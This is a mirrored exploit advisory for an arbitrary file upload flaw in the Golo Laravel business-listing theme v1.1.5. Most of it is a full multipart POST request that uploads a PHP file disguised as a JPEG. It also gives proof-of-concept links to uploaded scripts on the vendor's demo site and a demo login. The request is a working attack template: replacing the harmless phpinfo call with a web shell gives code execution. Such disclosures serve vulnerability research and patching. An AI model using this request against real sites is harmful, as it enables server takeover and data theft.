Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070070

Below is a copy:

Golo - Business Listing, City Travel Guide Laravel Theme v1.1.5 - Arbitrary File Upload
[+] Exploit Title: Golo - Business Listing, City Travel Guide Laravel Theme v1.1.5 - Arbitrary File Upload
[+] Google Dork: n/a
[+] Date: 2020-07-02
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Uxper [ http://uxper.co ]
[+] Software Version: 1.1.5
[+] Software Link: https://codecanyon.net/item/golo-city-guide-laravel-theme/25785389
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-434



### [ Info: ]

[i] An Arbitrary File Upload vulnerability was discovered in the Golo Laravel theme v1.1.5.

[i] Demo account: [email protected] / [email protected][email protected]# (login / password)

[i] PoC Link #1: https://lara-business.getgolo.com/uploads/5f09c6d90c71c_1594476249.php

[i] PoC Link #2: https://lara-business.getgolo.com/uploads/5f09c6dcdde81_1594476252.php

[i] PoC Link #3: https://lara-business.getgolo.com/uploads/5f09c6df3b17d_1594476255.php

[i] PoC Link #4: https://lara-business.getgolo.com/uploads/5f09c3f7ec959_1594475511.svg



### [ PoC: ]

[!] POST /place HTTP/1.1
Host: lara-business.getgolo.com
Content-Type: multipart/form-data; boundary=---------------------------24734096191242901897977687797
Content-Length: 4732
Origin: https://lara-business.getgolo.com
Referer: https://lara-business.getgolo.com/new-place
Cookie: [cookies_here]

-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="_token"

i6gbRoTMcw6JP9U23pHR3b2IvxSDGrHSPJBroucJ
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="en[name]"

Night City
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="price_range"

4
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="en[description]"

PoC
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="category[]"

20
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="place_type[]"

33
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="amenities[]"

13
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="amenities[]"

9
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="amenities[]"

6
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="country_id"

11
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="city_id"

26
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="address"

31337
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="lat"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="lng"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="email"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="phone_number"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="website"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="social[0][name]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="social[0][url]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[0][title]"

Monday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[0][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[1][title]"

Tuesday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[1][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[2][title]"

Wednesday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[2][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[3][title]"

Thursday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[3][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[4][title]"

Friday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[4][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[5][title]"

Saturday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[5][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[6][title]"

Sunday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[6][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="thumb"; filename="vladvector.php"
Content-Type: image/jpeg


<?php
phpinfo();
?>
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="gallery[]"

vladvector.php
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="video"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="place_id"


-----------------------------24734096191242901897977687797--



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.